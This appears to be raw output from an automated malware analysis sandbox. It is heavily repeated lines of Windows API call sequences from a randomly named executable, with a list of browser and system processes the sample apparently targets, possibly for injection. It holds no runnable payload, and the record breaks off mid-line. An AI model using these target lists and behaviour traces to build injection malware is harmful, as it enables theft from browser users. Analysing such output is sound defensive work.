Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01243510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01243510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01243510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01056370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01056370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01056370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01043510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01043510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01043510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandl